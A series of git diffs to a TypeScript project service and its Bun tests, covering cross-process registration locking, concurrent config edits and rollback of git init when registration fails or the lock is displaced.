+      await fs.mkdir(path.dirname(projectRegistrationLockFilePath(tempDir)), { recursive: true });
+      await fs.rm(path.dirname(projectRegistrationLockFilePath(tempDir)), { recursive: true });
+      await fs.writeFile(path.dirname(projectRegistrationLockFilePath(tempDir)), "file", "utf-8");
+
+      const result = await service.create(target);
+      expect(result.success).toBe(false);
+      if (result.success) throw new Error("Expected failure");
+      expect(result.error).toContain("Failed to create project");
+    });
+
     it("forgets retained trust for cascade-removed sub-projects", async () => {
       const parentPath = "/fake/parent";
       const childPath = "/fake/parent/packages/api";

--- a/src/node/services/projectService.test.ts
+++ b/src/node/services/projectService.test.ts
@@ -1,5 +1,5 @@
 import * as path from "path";
-import { describe, it, expect, beforeEach, afterEach } from "bun:test";
+import { describe, it, expect, beforeEach, afterEach, spyOn } from "bun:test";
 import * as fs from "fs/promises";
 import * as os from "os";
 import { execSync } from "child_process";
@@ -2874,6 +2874,32 @@ exit 1
       const projects = config.loadConfigOrDefault().projects;
       expect(projects.has("/fake/from-this-process")).toBe(true);
       expect(projects.has("/fake/from-other-process")).toBe(true);
+    });
+
+    it("validates a new project without holding the registration lock", async () => {
+      const target = path.join(tempDir, "validated-unlocked");
+      await fs.mkdir(target);
+      // Another process holds the lock throughout the validation. Every config save waits
+      // for that lock, so a create that took it around its stats, realpath, and git probes
+      // would hold up unrelated saves for as long as a slow filesystem keeps it busy.
+      const otherProcess = await acquireProcessFileLock({
+        lockPath: projectRegistrationLockFilePath(tempDir),
+        timeoutMs: 5_000,
+        label: "test holder",
+      });
+      const editConfig = spyOn(config, "editConfig");
+      const creating = service.create(target);
+      // The validation reaches the registering write while the lock is still held elsewhere.
+      const deadline = Date.now() + 2_000;
+      while (editConfig.mock.calls.length === 0 && Date.now() < deadline) {
+        await new Promise((resolve) => setTimeout(resolve, 10));
+      }
+      expect(editConfig).toHaveBeenCalledTimes(1);
+      expect(config.loadConfigOrDefault().projects.has(target)).toBe(false);
+
+      await otherProcess[Symbol.asyncDispose]();
+      expect((await creating).success).toBe(true);
+      expect(config.loadConfigOrDefault().projects.has(target)).toBe(true);
     });
 
     it("refuses to register once another process has displaced the registration lock", async () => {

--- a/src/node/services/projectService.test.ts
+++ b/src/node/services/projectService.test.ts
@@ -2839,17 +2839,15 @@ exit 1
         .then(() => {
           registered = true;
         });
-      // A window in this process waits too; an edit that leaves the project set alone does not.
+      // A window in this process waits too.
       let windowRan = false;
       const window = withProjectRegistrationLock(tempDir, () => {
         windowRan = true;
         return Promise.resolve();
       });
-      await config.editConfig((cfg) => ({ ...cfg, llmDebugLogs: true }));
-      await new Promise((resolve) => setTimeout(resolve, 150));
+      await new Promise((resolve) => setTimeout(resolve, 100));
       expect(registered).toBe(false);
       expect(windowRan).toBe(false);
-      expect(config.loadConfigOrDefault().llmDebugLogs).toBe(true);
 
       // The other process registers a project while ours waits: our transform must run again
       // on those bytes, or its pre-wait snapshot would clobber that registration.
@@ -2918,6 +2916,52 @@ exit 1
       const after = config.loadConfigOrDefault();
       expect(after.llmDebugLogs).toBe(true);
       expect(after.projects.has("/fake/registered-meanwhile")).toBe(true);
+    });
+
+    it("does not let a value-only edit slip past a foreign hold while another edit waits for it", async () => {
+      // A registration edit waiting for another process's hold must not make a concurrent
+      // value-only edit believe this process holds the lock: both have to wait, or the
+      // value-only edit's whole-config save drops what the other process registers.
+      const otherProcess = await acquireProcessFileLock({
+        lockPath: projectRegistrationLockFilePath(tempDir),
+        timeoutMs: 5_000,
+        label: "test holder",
+      });
+      let registered = false;
+      const registering = config
+        .editConfig((cfg) => {
+          cfg.projects.set("/fake/waiting-registration", { workspaces: [] });
+          return cfg;
+        })
+        .then(() => {
+          registered = true;
+        });
+      await new Promise((resolve) => setTimeout(resolve, 100));
+      expect(registered).toBe(false);
+      let valueSaved = false;
+      const valueEdit = config
+        .editConfig((cfg) => ({ ...cfg, llmDebugLogs: true }))
+        .then(() => {
+          valueSaved = true;
+        });
+      await new Promise((resolve) => setTimeout(resolve, 150));
+      expect(valueSaved).toBe(false);
+
+      const otherConfig = new Config(tempDir);
+      await otherConfig.editConfig(
+        (cfg) => {
+          cfg.projects.set("/fake/from-other-process", { workspaces: [] });
+          return cfg;
+        },
+        { withinRegistrationLock: otherProcess }
+      );
+      await otherProcess[Symbol.asyncDispose]();
+      await Promise.all([registering, valueEdit]);
+
+      const after = config.loadConfigOrDefault();
+      expect(after.llmDebugLogs).toBe(true);
+      expect(after.projects.has("/fake/waiting-registration")).toBe(true);
+      expect(after.projects.has("/fake/from-other-process")).toBe(true);
     });
 
     it("returns an Err when the registration lock cannot be taken", async () => {

--- a/src/node/services/projectService.test.ts
+++ b/src/node/services/projectService.test.ts
@@ -11,7 +11,7 @@ import type { SshPromptRequest } from "@/common/orpc/schemas/ssh";
 import { SshPromptService } from "@/node/services/sshPromptService";
 import { MULTI_PROJECT_CONFIG_KEY } from "@/common/constants/multiProject";
 import { ProjectService, type CloneEvent } from "./projectService";
-import { withProjectRegistrationLock } from "@/node/services/refinement/targetMutationLocks";
+import { withProjectRegistrationLock } from "@/node/config/projectRegistrationLock";
 
 async function createLocalGitRepository(rootDir: string, repoName: string): Promise<string> {
   const repoPath = path.join(rootDir, repoName);
@@ -137,6 +137,14 @@ async function collectCloneEvents(
   const clonedUrls = (await fs.readFile(fakeGit.fakeGitArgsLogPath, "utf-8")).trim().split("\n");
   return { events, clonedUrls };
 }
+
+/**
+ * Simulated concurrent registration for create()'s in-transform duplicate re-check. Real
+ * writers are serialized with create() by the registration lock (Config.editConfig takes
+ * it for any project-set change), so the interleaving these tests exercise is reproduced by
+ * marking the edit as a same-window writer; the re-check stays as defense in depth.
+ */
+const REGISTER_CONCURRENTLY = { withinRegistrationLock: true } as const;
 
 describe("ProjectService", () => {
   let tempDir: string;
@@ -268,7 +276,7 @@ describe("ProjectService", () => {
       const registerParent = config.editConfig((cfg) => {
         cfg.projects.set(parentPath, { workspaces: [] });
         return cfg;
-      });
+      }, REGISTER_CONCURRENTLY);
       const result = await service.create(nestedAliasPath, { initGit: true });
       await registerParent;
 
@@ -342,7 +350,7 @@ exit 1
       const registerPlain = config.editConfig((cfg) => {
         cfg.projects.set(projectPath, { workspaces: [] });
         return cfg;
-      });
+      }, REGISTER_CONCURRENTLY);
       const result = await service.create(projectPath, { initGit: true });
       await registerPlain;
 
@@ -403,7 +411,7 @@ exit 1
       const registerDescendant = config.editConfig((cfg) => {
         cfg.projects.set(descendantPath, { workspaces: [] });
         return cfg;
-      });
+      }, REGISTER_CONCURRENTLY);
       const result = await service.create(parentPath, { initGit: true });
       await registerDescendant;
 
@@ -559,7 +567,7 @@ exec ${realGit} "$@"
       const registerPkg = config.editConfig((cfg) => {
         cfg.projects.set(pkgPath, { workspaces: [], parentProjectPath: repoPath });
         return cfg;
-      });
+      }, REGISTER_CONCURRENTLY);
       const api = await service.create(apiPath);
       await registerPkg;
 
@@ -591,7 +599,7 @@ exec ${realGit} "$@"
       const registerRepo = config.editConfig((cfg) => {
         cfg.projects.set(repoPath, { workspaces: [] });
         return cfg;
-      });
+      }, REGISTER_CONCURRENTLY);
       const result = await service.create(pkgPath);
       await registerRepo;
 
@@ -616,7 +624,7 @@ exec ${realGit} "$@"
       const registerDescendant = config.editConfig((cfg) => {
         cfg.projects.set(descendantPath, { workspaces: [] });
         return cfg;
-      });
+      }, REGISTER_CONCURRENTLY);
       const result = await service.create(parentPath);
       await registerDescendant;
 
@@ -2775,6 +2783,36 @@ exit 1
       expect((await removing).success).toBe(true);
       expect(config.loadConfigOrDefault().projects.has(existing)).toBe(false);
       expect(config.loadConfigOrDefault().projects.has(target)).toBe(true);
+    });
+
+    it("gates every registration path through Config, not just create and remove", async () => {
+      // setTrust registers a missing entry as a side effect — one of several writers that
+      // add a project key without going through create(). Config.editConfig serializes it
+      // with the restore window all the same, while an edit that changes nothing about the
+      // project set goes through immediately.
+      const unregistered = "/fake/trusted-later";
+      const held = Promise.withResolvers<void>();
+      const lockAcquired = Promise.withResolvers<void>();
+      const holding = withProjectRegistrationLock(tempDir, async () => {
+        lockAcquired.resolve();
+        await held.promise;
+      });
+      await lockAcquired.promise;
+
+      let trusted = false;
+      const trusting = service.setTrust(unregistered, true).then(() => {
+        trusted = true;
+      });
+      await config.editConfig((cfg) => ({ ...cfg, llmDebugLogs: true }));
+      await new Promise((resolve) => setTimeout(resolve, 100));
+      expect(trusted).toBe(false);
+      expect(config.loadConfigOrDefault().projects.has(unregistered)).toBe(false);
+      expect(config.loadConfigOrDefault().llmDebugLogs).toBe(true);
+
+      held.resolve();
+      await holding;
+      await trusting;
+      expect(config.loadConfigOrDefault().projects.get(unregistered)?.trusted).toBe(true);
     });
 
     it("forgets retained trust for cascade-removed sub-projects", async () => {

--- a/src/node/services/projectService.test.ts
+++ b/src/node/services/projectService.test.ts
@@ -11,7 +11,11 @@ import type { SshPromptRequest } from "@/common/orpc/schemas/ssh";
 import { SshPromptService } from "@/node/services/sshPromptService";
 import { MULTI_PROJECT_CONFIG_KEY } from "@/common/constants/multiProject";
 import { ProjectService, type CloneEvent } from "./projectService";
-import { withProjectRegistrationLock } from "@/node/config/projectRegistrationLock";
+import {
+  projectRegistrationLockFilePath,
+  withProjectRegistrationLock,
+} from "@/node/config/projectRegistrationLock";
+import { acquireProcessFileLock } from "@/node/utils/concurrency/fileLock";
 
 async function createLocalGitRepository(rootDir: string, repoName: string): Promise<string> {
   const repoPath = path.join(rootDir, repoName);
@@ -2813,6 +2817,56 @@ exit 1
       await holding;
       await trusting;
       expect(config.loadConfigOrDefault().projects.get(unregistered)?.trusted).toBe(true);
+    });
+
+    it("waits for another process's registration hold and re-reads config under it", async () => {
+      // The cross-process leg, as `mux trust` or a restore in another process would hold it.
+      const otherProcess = await acquireProcessFileLock({
+        lockPath: projectRegistrationLockFilePath(tempDir),
+        timeoutMs: 5_000,
+        label: "test holder",
+      });
+      let transformRuns = 0;
+      let registered = false;
+      const registering = config
+        .editConfig((cfg) => {
+          transformRuns += 1;
+          cfg.projects.set("/fake/from-this-process", { workspaces: [] });
+          return cfg;
+        })
+        .then(() => {
+          registered = true;
+        });
+      // A window in this process waits too; an edit that leaves the project set alone does not.
+      let windowRan = false;
+      const window = withProjectRegistrationLock(tempDir, () => {
+        windowRan = true;
+        return Promise.resolve();
+      });
+      await config.editConfig((cfg) => ({ ...cfg, llmDebugLogs: true }));
+      await new Promise((resolve) => setTimeout(resolve, 150));
+      expect(registered).toBe(false);
+      expect(windowRan).toBe(false);
+      expect(config.loadConfigOrDefault().llmDebugLogs).toBe(true);
+
+      // The other process registers a project while ours waits: our transform must run again
+      // on those bytes, or its pre-wait snapshot would clobber that registration.
+      const otherConfig = new Config(tempDir);
+      await otherConfig.editConfig(
+        (cfg) => {
+          cfg.projects.set("/fake/from-other-process", { workspaces: [] });
+          return cfg;
+        },
+        { withinRegistrationLock: true }
+      );
+      await otherProcess[Symbol.asyncDispose]();
+      await registering;
+      await window;
+
+      expect(transformRuns).toBe(2);
+      const projects = config.loadConfigOrDefault().projects;
+      expect(projects.has("/fake/from-this-process")).toBe(true);
+      expect(projects.has("/fake/from-other-process")).toBe(true);
     });
 
     it("forgets retained trust for cascade-removed sub-projects", async () => {

--- a/src/node/services/projectService.test.ts
+++ b/src/node/services/projectService.test.ts
@@ -148,7 +148,9 @@ async function collectCloneEvents(
  * it for any project-set change), so the interleaving these tests exercise is reproduced by
  * marking the edit as a same-window writer; the re-check stays as defense in depth.
  */
-const REGISTER_CONCURRENTLY = { withinRegistrationLock: true } as const;
+const REGISTER_CONCURRENTLY = {
+  withinRegistrationLock: { assertStillOwned: () => Promise.resolve() },
+} as const;
 
 describe("ProjectService", () => {
   let tempDir: string;
@@ -2857,7 +2859,7 @@ exit 1
           cfg.projects.set("/fake/from-other-process", { workspaces: [] });
           return cfg;
         },
-        { withinRegistrationLock: true }
+        { withinRegistrationLock: otherProcess }
       );
       await otherProcess[Symbol.asyncDispose]();
       await registering;
@@ -2867,6 +2869,21 @@ exit 1
       const projects = config.loadConfigOrDefault().projects;
       expect(projects.has("/fake/from-this-process")).toBe(true);
       expect(projects.has("/fake/from-other-process")).toBe(true);
+    });
+
+    it("refuses to register once another process has displaced the registration lock", async () => {
+      const target = path.join(tempDir, "displaced");
+      await fs.mkdir(target);
+      // A holder frozen past the lease is judged stale and displaced; when it resumes, its
+      // registration must not commit as if it still held the lock.
+      const result = await service.withRegistrationLock(async ({ create }) => {
+        await fs.writeFile(projectRegistrationLockFilePath(tempDir), "another holder", "utf-8");
+        return create(target);
+      });
+      expect(result.success).toBe(false);
+      if (result.success) throw new Error("Expected failure");
+      expect(result.error).toContain("no longer owned");
+      expect(config.loadConfigOrDefault().projects.has(target)).toBe(false);
     });
 
     it("forgets retained trust for cascade-removed sub-projects", async () => {

--- a/src/node/services/projectService.test.ts
+++ b/src/node/services/projectService.test.ts
@@ -2855,8 +2855,9 @@ exit 1
       expect(registered).toBe(false);
       expect(windowRan).toBe(false);
 
-      // The other process registers a project while ours waits: our transform must run again
-      // on those bytes, or its pre-wait snapshot would clobber that registration.
+      // The other process registers a project while ours waits: our transform must run on
+      // those bytes — once, under the lock — or a pre-wait snapshot would clobber that
+      // registration.
       const otherConfig = new Config(tempDir);
       await otherConfig.editConfig(
         (cfg) => {
@@ -2869,7 +2870,7 @@ exit 1
       await registering;
       await window;
 
-      expect(transformRuns).toBe(2);
+      expect(transformRuns).toBe(1);
       const projects = config.loadConfigOrDefault().projects;
       expect(projects.has("/fake/from-this-process")).toBe(true);
       expect(projects.has("/fake/from-other-process")).toBe(true);

--- a/src/node/services/projectService.test.ts
+++ b/src/node/services/projectService.test.ts
@@ -2887,18 +2887,56 @@ exit 1
         timeoutMs: 5_000,
         label: "test holder",
       });
+      // The path resolution is the last filesystem probe of the validation; the registering
+      // write is the first thing the lock covers.
+      const realpath = spyOn(fs, "realpath");
       const editConfig = spyOn(config, "editConfig");
       const creating = service.create(target);
-      // The validation reaches the registering write while the lock is still held elsewhere.
       const deadline = Date.now() + 2_000;
-      while (editConfig.mock.calls.length === 0 && Date.now() < deadline) {
+      while (realpath.mock.calls.length === 0 && Date.now() < deadline) {
         await new Promise((resolve) => setTimeout(resolve, 10));
       }
-      expect(editConfig).toHaveBeenCalledTimes(1);
+      // Validated while the lock is still held elsewhere, but not yet registering.
+      expect(realpath).toHaveBeenCalledWith(target);
+      expect(editConfig).not.toHaveBeenCalled();
       expect(config.loadConfigOrDefault().projects.has(target)).toBe(false);
 
       await otherProcess[Symbol.asyncDispose]();
       expect((await creating).success).toBe(true);
+      expect(editConfig).toHaveBeenCalledTimes(1);
+      expect(config.loadConfigOrDefault().projects.has(target)).toBe(true);
+      realpath.mockRestore();
+    });
+
+    it("does not git-initialize a directory an import registers while it waits for the lock", async () => {
+      const target = path.join(tempDir, "imported-empty");
+      await fs.mkdir(target);
+      const initializeGit = spyOn(
+        service as unknown as { initializeGitRepository: () => unknown },
+        "initializeGitRepository"
+      );
+      // A restore window registers the same empty directory as an import target while an
+      // initGit create of it waits for the lock. The create must fail as a duplicate without
+      // having run `git init` there: initializing and rolling back inside a directory that
+      // is the import's by then would touch the imported project's checkout.
+      const windowOpen = Promise.withResolvers<void>();
+      const proceed = Promise.withResolvers<void>();
+      const window = service.withRegistrationLock(async ({ create }) => {
+        windowOpen.resolve();
+        await proceed.promise;
+        expect((await create(target)).success).toBe(true);
+      });
+      await windowOpen.promise;
+      const creating = service.create(target, { initGit: true });
+      await new Promise((resolve) => setTimeout(resolve, 100));
+      proceed.resolve();
+      await window;
+
+      const result = await creating;
+      expect(result.success).toBe(false);
+      expect(!result.success && result.error).toBe("Project already exists");
+      expect(initializeGit).not.toHaveBeenCalled();
+      expect(await fs.lstat(path.join(target, ".git")).catch(() => null)).toBeNull();
       expect(config.loadConfigOrDefault().projects.has(target)).toBe(true);
     });
 

--- a/src/node/services/projectService.test.ts
+++ b/src/node/services/projectService.test.ts
@@ -2794,8 +2794,8 @@ exit 1
     it("gates every registration path through Config, not just create and remove", async () => {
       // setTrust registers a missing entry as a side effect — one of several writers that
       // add a project key without going through create(). Config.editConfig serializes it
-      // with the restore window all the same, while an edit that changes nothing about the
-      // project set goes through immediately.
+      // with the restore window all the same — as it does every edit, since each one saves
+      // the whole config.
       const unregistered = "/fake/trusted-later";
       const held = Promise.withResolvers<void>();
       const lockAcquired = Promise.withResolvers<void>();
@@ -2809,16 +2809,22 @@ exit 1
       const trusting = service.setTrust(unregistered, true).then(() => {
         trusted = true;
       });
-      await config.editConfig((cfg) => ({ ...cfg, llmDebugLogs: true }));
+      let valueSaved = false;
+      const valueEdit = config
+        .editConfig((cfg) => ({ ...cfg, llmDebugLogs: true }))
+        .then(() => {
+          valueSaved = true;
+        });
       await new Promise((resolve) => setTimeout(resolve, 100));
       expect(trusted).toBe(false);
+      expect(valueSaved).toBe(false);
       expect(config.loadConfigOrDefault().projects.has(unregistered)).toBe(false);
-      expect(config.loadConfigOrDefault().llmDebugLogs).toBe(true);
 
       held.resolve();
       await holding;
-      await trusting;
+      await Promise.all([trusting, valueEdit]);
       expect(config.loadConfigOrDefault().projects.get(unregistered)?.trusted).toBe(true);
+      expect(config.loadConfigOrDefault().llmDebugLogs).toBe(true);
     });
 
     it("waits for another process's registration hold and re-reads config under it", async () => {

--- a/src/node/services/projectService.test.ts
+++ b/src/node/services/projectService.test.ts
@@ -2940,6 +2940,23 @@ exit 1
       expect(config.loadConfigOrDefault().projects.has(target)).toBe(true);
     });
 
+    it("rolls back git init when the registering write finds the hold reclaimed", async () => {
+      const target = path.join(tempDir, "reclaimed-init");
+      await fs.mkdir(target);
+      const result = await service.withRegistrationLock(async ({ create }) => {
+        // Displaced while git init runs, by a holder whose pid is dead: the registering
+        // write's ownership check refuses, and the rollback's own hold can reclaim the lock.
+        await fs.writeFile(projectRegistrationLockFilePath(tempDir), "9999999:reclaimed", "utf-8");
+        return create(target, { initGit: true });
+      });
+      expect(result.success).toBe(false);
+      expect(!result.success && result.error).toContain("no longer owned");
+      expect(config.loadConfigOrDefault().projects.has(target)).toBe(false);
+      // Left behind, the .git would fail every retry on the non-empty-directory check.
+      expect(await fs.lstat(path.join(target, ".git")).catch(() => null)).toBeNull();
+      expect((await service.create(target, { initGit: true })).success).toBe(true);
+    });
+
     it("refuses to register once another process has displaced the registration lock", async () => {
       const target = path.join(tempDir, "displaced");
       await fs.mkdir(target);

--- a/src/node/services/projectService.test.ts
+++ b/src/node/services/projectService.test.ts
@@ -11,6 +11,7 @@ import type { SshPromptRequest } from "@/common/orpc/schemas/ssh";
 import { SshPromptService } from "@/node/services/sshPromptService";
 import { MULTI_PROJECT_CONFIG_KEY } from "@/common/constants/multiProject";
 import { ProjectService, type CloneEvent } from "./projectService";
+import { withProjectRegistrationLock } from "@/node/services/refinement/targetMutationLocks";
 
 async function createLocalGitRepository(rootDir: string, repoName: string): Promise<string> {
   const repoPath = path.join(rootDir, repoName);
@@ -2707,6 +2708,37 @@ exit 1
       expect(result.success).toBe(false);
       if (result.success) throw new Error("Expected failure");
       expect(result.error.type).toBe("project_not_found");
+    });
+
+    it("waits for a settings-backup restore holding the registration lock", async () => {
+      const projectPath = "/fake/project";
+      const cfg = config.loadConfigOrDefault();
+      cfg.projects.set(projectPath, { workspaces: [] });
+      await config.editConfig(() => cfg);
+
+      // A restore writing this project's matched memory holds the lock; the removal must
+      // land after it, never between its registration read and its memory write.
+      const held = Promise.withResolvers<void>();
+      const lockAcquired = Promise.withResolvers<void>();
+      const holding = withProjectRegistrationLock(tempDir, async () => {
+        lockAcquired.resolve();
+        await held.promise;
+      });
+      await lockAcquired.promise;
+
+      let removed = false;
+      const removing = service.remove(projectPath).then((result) => {
+        removed = true;
+        return result;
+      });
+      await new Promise((resolve) => setTimeout(resolve, 100));
+      expect(removed).toBe(false);
+      expect(config.loadConfigOrDefault().projects.has(projectPath)).toBe(true);
+
+      held.resolve();
+      await holding;
+      expect((await removing).success).toBe(true);
+      expect(config.loadConfigOrDefault().projects.has(projectPath)).toBe(false);
     });
 
     it("forgets retained trust for cascade-removed sub-projects", async () => {

--- a/src/node/services/projectService.test.ts
+++ b/src/node/services/projectService.test.ts
@@ -2957,6 +2957,29 @@ exit 1
       expect((await service.create(target, { initGit: true })).success).toBe(true);
     });
 
+    it("keeps a directory registered under another spelling while its hold was reclaimed", async () => {
+      const target = path.join(tempDir, "reclaimed-target");
+      const alias = path.join(tempDir, "reclaimed-alias");
+      await fs.symlink(target, alias, "dir");
+      const result = await service.withRegistrationLock(async ({ create }) => {
+        await fs.writeFile(projectRegistrationLockFilePath(tempDir), "9999999:reclaimed", "utf-8");
+        // The process that reclaimed the lock registered the same directory through a
+        // symlink: neither spelling create() knows is a registry key.
+        await new Config(tempDir).editConfig((cfg) => {
+          cfg.projects.set(alias, { workspaces: [] });
+          return cfg;
+        }, REGISTER_CONCURRENTLY);
+        return create(target, { initGit: true });
+      });
+      expect(result.success).toBe(false);
+      expect(!result.success && result.error).toContain("no longer owned");
+      // The directory this request created is the winner's checkout now and stays; only the
+      // .git the request initialized into it goes.
+      expect((await fs.stat(target)).isDirectory()).toBe(true);
+      expect(await fs.lstat(path.join(target, ".git")).catch(() => null)).toBeNull();
+      expect(config.loadConfigOrDefault().projects.has(alias)).toBe(true);
+    });
+
     it("refuses to register once another process has displaced the registration lock", async () => {
       const target = path.join(tempDir, "displaced");
       await fs.mkdir(target);

--- a/src/node/services/projectService.ts
+++ b/src/node/services/projectService.ts
@@ -431,7 +431,7 @@ export class ProjectService {
 
   async create(
     projectPath: string,
-    options?: { initGit?: boolean }
+    options?: { initGit?: boolean; displayName?: string }
   ): Promise<Result<{ projectConfig: ProjectConfig; normalizedPath: string }>> {
     let gitInitClaimKey: string | null = null;
     try {
@@ -704,6 +704,9 @@ export class ProjectService {
         const projectConfig: ProjectConfig = {
           workspaces: [],
           parentProjectPath: freshParentProjectPath ?? undefined,
+          // Set in the same config write as the registration (a backup restore names
+          // imported projects) rather than as a second write and notification.
+          ...(options?.displayName !== undefined ? { displayName: options.displayName } : {}),
         };
         freshConfig.projects.set(normalizedPath, projectConfig);
         freshConfig.projects = deriveProjectHierarchy(freshConfig.projects);

--- a/src/node/services/projectService.ts
+++ b/src/node/services/projectService.ts
@@ -437,13 +437,13 @@ export class ProjectService {
     projectPath: string,
     options?: { initGit?: boolean; displayName?: string }
   ): Promise<Result<{ projectConfig: ProjectConfig; normalizedPath: string }>> {
-    // No registration lock around the validation: it stats, resolves, and runs git against
-    // the new path, which on a slow or unavailable filesystem can take as long as the lock's
-    // wait bound — and every config save in every process waits for that lock, so holding it
-    // here would stall unrelated workspace, task, and settings saves behind one stuck create.
-    // The registering write below takes the lock itself, through editConfig, and re-validates
-    // against the config as it is under that hold; only withRegistrationLock callers, which
-    // already hold a window, register inside it.
+    // No registration lock around the validation: it stats, resolves, and reads git roots
+    // along the new path, which on a slow or unavailable filesystem can take as long as the
+    // lock's wait bound — and every config save in every process waits for that lock, so
+    // holding it here would stall unrelated workspace, task, and settings saves behind one
+    // stuck create. createUnlocked takes the lock itself around what mutates state (a git
+    // init, the registering write) and re-validates under it; withRegistrationLock callers
+    // pass the window they already hold.
     return this.createUnlocked(projectPath, options, null);
   }
 
@@ -468,7 +468,7 @@ export class ProjectService {
     );
   }
 
-  /** `lock`: the caller's registration window, or null when editConfig is to take its own. */
+  /** `lock`: the caller's registration window, or null to open one for the mutating steps. */
   private async createUnlocked(
     projectPath: string,
     options: { initGit?: boolean; displayName?: string } | undefined,
@@ -656,142 +656,167 @@ export class ProjectService {
         }
       }
 
-      if (options?.initGit) {
-        // Exclusive per-canonical-path claim: two initGit creates targeting the same
-        // pre-existing empty directory would otherwise interleave git init and failure
-        // rollback, letting one call delete the .git the other just initialized.
-        if (this.activeGitInits.has(canonicalPath)) {
-          return Err("Another project creation is already initializing this directory");
-        }
-        this.activeGitInits.add(canonicalPath);
-        gitInitClaimKey = canonicalPath;
+      // From here on the request mutates state — a git init into the directory, the
+      // registering write — so it runs under the registration lock: the window a
+      // withRegistrationLock caller holds, or one opened here. The read-only validation above
+      // stayed outside it (see create).
+      const register = async (
+        lock: ProjectRegistrationLockHandle
+      ): Promise<Result<{ projectConfig: ProjectConfig; normalizedPath: string }>> => {
+        if (options?.initGit) {
+          // The project set as it is under the lock, before anything is written into the
+          // directory: registered meanwhile — a settings-backup import into this same empty
+          // directory, say — it is the winner's now, and this request fails as the duplicate
+          // it is without having initialized a repository inside the winner's checkout only
+          // to roll it back again.
+          const current = this.config.loadConfigOrDefault();
+          if (current.projects.has(normalizedPath) || current.projects.has(canonicalPath)) {
+            return Err("Project already exists");
+          }
+          // Exclusive per-canonical-path claim: two initGit creates targeting the same
+          // pre-existing empty directory would otherwise interleave git init and failure
+          // rollback, letting one call delete the .git the other just initialized.
+          if (this.activeGitInits.has(canonicalPath)) {
+            return Err("Another project creation is already initializing this directory");
+          }
+          this.activeGitInits.add(canonicalPath);
+          gitInitClaimKey = canonicalPath;
 
-        const gitInitResult = await this.initializeGitRepository(normalizedPath);
-        if (!gitInitResult.success) {
+          const gitInitResult = await this.initializeGitRepository(normalizedPath);
+          if (!gitInitResult.success) {
+            await cleanupCreatedDirectory();
+            return gitInitResult;
+          }
+          initializedGitDir = gitInitResult.data.initializedGitDir;
+        }
+
+        // Register the project inside the serialized editConfig transform, re-checking for
+        // duplicates and re-deriving the hierarchy from FRESH config: persisting the pre-read
+        // snapshot would clobber concurrent config edits (lost-update race). The async
+        // validations above (git roots, sub-project depth) ran against the snapshot; the
+        // transform only re-resolves state that a concurrent edit could have changed.
+        let createResult: Result<{ projectConfig: ProjectConfig; normalizedPath: string }> =
+          Err("Project already exists");
+        // Distinguishes in-transform failures for directory cleanup: when a concurrent
+        // call registered this same path ("duplicate"), the directory belongs to that
+        // winner and must not be deleted; other rejections leave the directory ours.
+        let transformFailure:
+          | "duplicate"
+          | "depth"
+          | "hierarchy-changed"
+          | "hierarchy-changed-descendant"
+          | null = null;
+        await this.config.editConfig(
+          (freshConfig) => {
+            if (
+              freshConfig.projects.has(normalizedPath) ||
+              freshConfig.projects.has(canonicalPath)
+            ) {
+              transformFailure = "duplicate";
+              createResult = Err("Project already exists");
+              return freshConfig;
+            }
+            freshConfig.projects = deriveProjectHierarchy(freshConfig.projects);
+            // Re-run the sub-project depth check against FRESH hierarchy: a concurrent
+            // registration (e.g. /repo/pkg landing while /repo/pkg/api is validating)
+            // can introduce a sub-project ancestor that the snapshot-time check missed,
+            // which would persist a second-level sub-project.
+            if (hasRegisteredSubProjectAncestor(normalizedPath, freshConfig.projects)) {
+              transformFailure = "depth";
+              createResult = Err("Sub-projects can only be one level deep");
+              return freshConfig;
+            }
+            const freshParentProjectPath = findDeepestTopLevelParentProject(
+              normalizedPath,
+              freshConfig.projects
+            );
+            // The same-git-repository validations above ran against the snapshot hierarchy
+            // only, and this transform is synchronous so it cannot re-run readGitTopLevel.
+            // If a concurrent edit introduced a different parent or new descendants, those
+            // were never git-validated — reject instead of persisting an unvalidated
+            // hierarchy (e.g. a sub-project from a different git repository).
+            const freshDescendantProjectPaths = Array.from(freshConfig.projects.keys()).filter(
+              (candidatePath) => isPathDescendant(normalizedPath, candidatePath)
+            );
+            const hasNewDescendantProject = freshDescendantProjectPaths.some(
+              (candidatePath) => !descendantProjectPaths.includes(candidatePath)
+            );
+            // Re-check the canonical parent for initGit: the snapshot-time rejection above
+            // can miss a parent registered concurrently, and the lexical freshParent check
+            // below cannot see it when this path reaches the checkout through a symlink.
+            if (
+              options?.initGit &&
+              findDeepestTopLevelParentProject(canonicalPath, freshConfig.projects)
+            ) {
+              transformFailure = "hierarchy-changed";
+              createResult = Err("Project hierarchy changed concurrently; please retry");
+              return freshConfig;
+            }
+            if (freshParentProjectPath !== parentProjectPath || hasNewDescendantProject) {
+              // A new descendant registered under this path claims the directory tree we
+              // created: recursive cleanup would delete that project's checkout, so treat
+              // it like the duplicate case and leave the directory alone.
+              transformFailure = hasNewDescendantProject
+                ? "hierarchy-changed-descendant"
+                : "hierarchy-changed";
+              createResult = Err("Project hierarchy changed concurrently; please retry");
+              return freshConfig;
+            }
+            const projectConfig: ProjectConfig = {
+              workspaces: [],
+              parentProjectPath: freshParentProjectPath ?? undefined,
+              // Set in the same config write as the registration (a backup restore names
+              // imported projects) rather than as a second write and notification.
+              ...(options?.displayName !== undefined ? { displayName: options.displayName } : {}),
+            };
+            freshConfig.projects.set(normalizedPath, projectConfig);
+            freshConfig.projects = deriveProjectHierarchy(freshConfig.projects);
+            createResult = Ok({ projectConfig, normalizedPath });
+            return freshConfig;
+          },
+          { withinRegistrationLock: lock }
+        );
+
+        // Do NOT clean up the created directory when a concurrent registration claims
+        // it: a duplicate owns this exact path, and a new descendant project lives
+        // inside the tree we created — recursive removal would destroy the winner's
+        // checkout either way (including files created after its call returned). Only
+        // depth and parent-only hierarchy rejections leave the directory ours to remove.
+        if (transformFailure === "depth" || transformFailure === "hierarchy-changed") {
           await cleanupCreatedDirectory();
-          return gitInitResult;
+        } else if (
+          (transformFailure === "hierarchy-changed-descendant" ||
+            transformFailure === "duplicate") &&
+          initializedGitDir
+        ) {
+          // The winning registration owns the files (a duplicate winner registered this
+          // exact pre-existing directory; a descendant winner lives inside it), but the
+          // .git this losing request created would silently turn the winner's project
+          // into a repository it never asked for, or wrap its checkout in an
+          // unregistered outer repository that changes git discovery.
+          await fsPromises
+            .rm(path.join(normalizedPath, ".git"), { recursive: true, force: true })
+            .catch((cleanupError: unknown) => {
+              log.error(`Failed to roll back git init in ${normalizedPath}:`, cleanupError);
+            });
         }
-        initializedGitDir = gitInitResult.data.initializedGitDir;
-      }
-
